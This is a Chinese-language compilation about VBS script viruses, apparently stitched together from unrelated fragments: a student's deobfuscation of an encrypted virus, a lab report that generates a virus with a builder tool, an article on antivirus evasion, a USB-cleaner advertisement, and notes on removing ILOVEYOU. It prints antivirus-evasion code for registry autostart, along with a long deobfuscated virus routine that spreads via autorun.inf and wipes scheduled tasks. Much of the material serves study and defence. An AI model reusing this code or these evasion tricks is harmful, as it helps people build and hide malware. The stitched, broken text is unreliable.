VBS脚本病毒分析及防范

对⼀个vbs脚本病毒的病毒原理分析⼀、前⾔病毒课⽼师丢给我们⼀份加密过的vbs脚本病毒的代码去尝试分析，这⾥把分析过程发出来，供⼤家参考，如果发现⽂中有什么错误或者是有啥建议，可以直接留⾔给我，谢谢！⼆、⽬录整个分析过程可以分为以下⼏个部分:0x00 准备⼯作0x01 解密部分0x02 功能分析三、分析过程0x00 准备⼯作windows xp的虚拟机(在⾃⼰的windows下也可以做)vbs的⼀些基本语法0x01 解密部分右击病毒⽂件然后编辑打开或者是直接把其后缀修改成txt直接打开都⾏，可以看到⼀⼤段密⽂，并调⽤了⼀个函数deCrypt。

暂时只看到这些，那么接着往下看吧。

拖到代码底部，发现有deCrypt了⼀次，也就是经过了两次加密，这⾥把执⾏部分注释掉，然后将解密的结果输出到⽂本⽂件中去。

另外，可以看到是⽤base64进⾏的加密的。

现在来看看解码后的结果。

发现依旧是不可阅读的代码，那就继续看看他是怎么处理的吧。

这⾥可以看到是将之前的字符串按“|dz|”划分，然后得到的是ascii码，将这些ascii码对应的字符拼接起来就好了，就得到了结果。

同样的套路将解密结果输出到⽂件中去再继续分析。

然后这次得到的结果是真正的病毒代码了。

接下来对他的功能进⾏分析。

0x02 功能分析从头开始看吧。

显⽰⼀些配置信息，包括了服务器的域名。

可以查到服务器是美国的，尝试ping了下，ping不通，可能是服务器作了设置不让⼈ping、也可能是服务器已经不⽤了、也有可能是我国的防⽕长城直接墙掉了。

然后是⼀些之后要⽤到的变量，这⾥不作过多的解释。

之后就是code start的部分了。

然后由于⾥⾯调⽤了各种函数，所以这⾥按执⾏的顺序给调⽤的函数编号，以便阅读，不然会感觉很凌乱的。

这⾥先是调⽤了instance函数。

1.instance函数给之前的⼀个参数usbspreading赋值，并对注册表进⾏写操作在执⾏完了instance函数后，会进⼊⼀个while true的死循环，不断从服务器读取命令，然后执⾏。

《网络攻击与防范》实验报告（２）单击“下一步”按钮·进人如图 4-2 所示的“禁止功能选项”设定界面.根据需要进行设定。

例如。

如果选中“禁止右键菜单”复选框.当运行了该病毒后.右击时将无法弹出快捷菜单。

图 4-2 设置“禁止功能选项”（３）单击“下一步”按钮.进入如图 4-3 所示的“病毒提示对话框”设定界面时。

根据需要设置有关开机时病毒的执行情况。

当选中“设置开机提示对话框”复选框.并设置了提示框标题和内容等后，相关信息将以对话框方式在开机时自动显示图4-3 设置开机时病毒的执行情况（４）单击“下一步”按钮，进入如图 4-4 所示的“病毒传播选项”设定界面,根据需要进行设定。

当选中“通过电子邮件进行自动传播(蠕虫)”复选框时.病毒可以向指定数量的用户发送垃圾邮件。

图4-3 设置开机时病毒的执行情况下一步夏上一步图4-4“病毒传播选项”设定界面（５）单击“下一步”按钮，进入“IE 修改选项”设定界面,根据需要进行设定。

注意.当选中“设置默认主页”复选框后，会弹出“设置主页”对话框,需要读者输人要修改的IE 浏览器主页地址(即每次打开IE 浏览器时默认打开的主页地址).如图 4-5 所示图4-5设置IE浏览器修改选项（6）单击“下一步”按钮，在出现的如图 4-6 所示的对话框中选择所生成的脚本病毒存放的位置,单击“开始制造”按钮,生成病毒文件。

图4-6选择所生成的脚本病毒存放的位置此时,可看到相应路径下,已经生成了脚本病毒文件3.2感染病毒并观察感染后的系统变化情况（１）将生成的脚本病毒文件置于虚拟机中,在其上双击使之运行。

为保证完整准确地查看病毒的感染效果.可重启已经感染了病毒的虚拟机系统。

然后，根据病毒文件生成时的设置，观察系统感染了病毒后的表现情况。

主要操作步骤如下。

（２）观察系统文件夹下的异常变化，可以发现，在 C:\ Windows,C:\Windows\system32下多了不明来源的脚本文件。

浅谈VBS脚本病毒入侵计算机的途径与防治作者：范秋生来源：《硅谷》2009年第21期[摘要]计算机病毒给世界范围内的计算机系统带了不可估量的危害,给人们留下了深刻的印象。

网络脚本病毒是计算机病毒的一种新形式,主要采用脚本语言编写,书写形式灵活,容易产生变种,它可以对系统进行操作,包括创建、修改、删除,甚至格式化硬盘,传播速度快,危害性大。

介绍VBS病毒的特点及发展现状,分析VBS病毒的原理、传播方式,并提出VBS病毒的防治策略。

[关键词]VBS病毒入侵方式病毒防治中图分类号:TP3文献标识码:A文章编号:1671-7597(2009)1110097-01一、VBS脚本病毒原理分析(一)VBS脚本病毒如何躲过杀毒软件现在杀毒的对vbs相当敏感,只要发现对注册表的xx作,或使用vbs运行命令(加用户)就可能被杀。

下面谈两种方法可以简单解决:1.使用连接符"&",如:Set CURObj = CreateObject("WScript.Shell")mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"CURObj.RegWrite ""&mhk&"internat.exe","internat.exe"2.使用Execute函数(BY动鲨)一些杀毒软件,如瑞星,它们会监视网页中的代码,一旦你创建了FSO或写注册表,即使是正常的脚本他也会报告危险,但是当年新欢乐时光也用了FSO怎么就没报警呢?原因是这个病毒使用Execute这个函数来躲过了防火墙,呵呵。

彻底清楚U盘vbs
VBS病毒，英文名：Visual Basic Script，该病毒程序虽然编写简单，但破坏力大，可通过感染htm、asp、jsp、php等网页文件而传播，该病毒一般都是通过不断的自我复制来感染文件，病毒中的部分代码甚至会直接附加在其他同类程序之中，中毒后的电脑会在各个盘符下生成.vbs、autorun.exe等文件。

影响电脑的运行速度，用户会觉得电脑越来越卡。

下面我们教大家认识VBS病毒，及正确使用U盘杀毒专家查杀VBS病毒。

第一步：认识VBS病毒
电脑中中了VBS病毒，会出现如下所示的.vbs文件，
注：文件名一般不定，有时会是：pagefileconfig.vbs或prndrvr.vbsprnjobs.vbs等，主要表现形式是，以.vbs 格式存在。

该病毒自我复制速度快，如果不即时清除，会在你的电脑中不断出现该文件的复制版。

第二步：安装U盘杀毒专家（USBKiller），查杀VBS病毒
如果你的电脑中没有安装U盘杀毒专家，可以点此下载，安装后，打开主界面，点击“开始扫描”：
扫描结束后，会出现病毒的名称，路径以及相应的处理结果。

应用U盘杀毒专家查杀VBS病毒，方便快捷，不用担心会删除后下次还会出现此类vbs病毒，另外，U 盘杀毒专家具有修复U盘的功能，在查杀U盘病毒的同时，修复您的U盘系统，并免疫您的U盘，更多有关U盘杀毒专家的介绍，请点击以下网址查阅：
/。

病毒名称：.vbsMD5: 64ea1c0e8f653984f0fde25b77f8494f此病毒是VBS脚本病毒，多重加密，通过U盘进行传播感染，设置注册表自启动，每过一段时间运行，通过设置特定条件，进行其他恶意行为。

网上卸载其他恶意程序并执行。

破坏系统隐藏属性。

整理一下主主体代码：j="\":til="SY" ‘autorun.inf中的节名:btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c " ‘cmd:dfo="/u#t/":inf="\autorun.inf" ‘自启动文件set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * from win32_operatingsystem")set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,falseouw=wscript.scriptfullname: 'scriptfullnamewin=fso.getspecialfolder(0)&j: 'C:\WINDOWSdir=fso.getspecialfolder(1)&j 'C:\WINDOWS\system32tmp=fso.getspecialfolder(2)&j: 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr(cnp,0):if cna="" then cna=tilwsc="wscript.exe"csc="cscript.exe"css=csc&" //nologo "wsr=rn&":createobject(""wscript.shell"").run"c=vbcrlf'-----------------inc------------------------'SY'[autorun]'open=wscript.exe .\.vbs'shell\open\command=wscript.exe .\.vbs'shell\open\default=1inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs &c&"shell\open\default=1"'-----------------inc------------------------sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr("HKCU"&rop&sf&"desktop",0)&j 'C:\Documents and Settings\Administrator\桌面\rpa="HKLM\software\"&cna&j: 'HKLM\software\QUBY-9B3768E839\fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs: 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbsfap=rr("HKCU"&rop&sf&"favorites",0)&j 'C:\Documents and Settings\Administrator\Favorites\ht=ec("ivwt?56"): 'http"\\ha=ec(":;9:7>5kw9"): '/hb=hl&"1;<<=6x"&hl&"r;" '|1;<<=6x|r;hc="0dwuEpE": '0dwuEpEhd=ec("$"+hc): '#.asp?i=he=ec("c"+hc) 'b.asp?i=rsp="HKLM\software\microsoft\windows\currentversion\"rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cnahip="HKCU"&rop&"advanced\showsuperhidden"sz=lcase(fso.getfilename(wscript.fullname))if mir=dir then sys=truefor each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:nextif instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then hb="p"+hb:lb="o" else hb="d"+hb:lb="c"for each d in dcif mir=d&j then ws.run "explorer "&d,3,false:bir=truenext'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘版本验证‘如果版本验证失败,则弹出“See You”消息框,执行km函数，参数为1‘验证成功执行km函数,参数为0,km是主要感染函数if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0if sys thenif sz=wsc then pr csc,-1if pr(csc,2)=1 then wscript.quitwscript.sleep 2000if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quitif rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4‘如果读取atd项注册表为1,那么删除所有计划任务if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0‘如果在temp文件夹存在le文件，那么执行le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&lecu:er 10elsewscript.sleep 5000if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",dateif pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,falseend if3.下面主要病毒思路，其他细节请看各个函数吧>_<(1)'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下'如果不是就退出if bir or sys or mir=win or mir=wbe then tir=true else wscript.quitouc=rt(ouw,-1): '读取本身代码ver=gv(ouw): ‘进行验证(2)‘如果上面验证错误，那么回弹出“See You”,之后执行Km函数，参数为1,否则参数为0‘这里是anti，也是为了防止编译成exe文件。

XI`AN TECHNOLOGICAL UNIVERSITY实验报告实验课程名称VB脚本病毒专业：信息对抗技术班级： 130609*名：***学号： *********实验学时： 12学时指导教师：***成绩：2016 年 4 月 5 日实验目的1.了解VB脚本病毒的工作原理2.了解VB脚本病毒常见的感染目标和感染方式3.掌握编写VB脚本病毒专杀工具的一般方法实验原理一．脚本病毒概述脚本程序的执行环境需要WSH（WINDOWS SCRIPT HOST，WINDOWS脚本宿主）环境，WSH为宿主脚本创建环境。

即当脚本到达计算机时，WSH充当主机的部分，它使对象和服务可用于脚本，并提供一系列脚本执行指南。

脚本病毒的主要特点：（1）由于脚本是直接解释执行，可以直接通过自我复制的方式感染其它同类文件，并且使异常处理变得非常容易。

（2）脚本病毒通过HTML文档、EMAIL附件或其它方式，可以在很短的时间内传遍世界各地，通常是使用在邮件附件中安置病毒本体的方法，然后利用人们的好奇心，通过邮件主题或邮件内容诱骗人们点击附件中的病毒体而被感染。

（3）新型的邮件病毒邮件正文即为病毒，用户接收到带毒邮件后，即使不将邮件打开，只要将鼠标指向邮件，通过预览功能病毒也会被自动激活。

（4）病毒源码容易被获取，变种多。

（5）欺骗性强。

二．爱虫病毒分析1．病毒简介“爱虫”（VBS.LOVELETTER）病毒从2000年5月4日开始在欧洲大陆迅速传播，并向全世界蔓延。

其传播原理是通过MICROSOFT OUTLOOK将名为“LOVE-LETTER-FOR-YOU.TXT.VBS”的邮件发送给用户地址薄里所有的地址。

当病毒运行后会在系统中留下以下文件：（1）\WINDOWS\WIN32DLL.VBS；（2）\SYSTEM\MSKERNEL.VBS；（3）\SYSTEM\LOVE-LETTER_FOR_YOU.TXT.VBS。

2．病毒的杀毒步骤（1）在WINDOWS下查看进程列表中是否有WSCRIPT这个文件，如有此文件说明已经感染。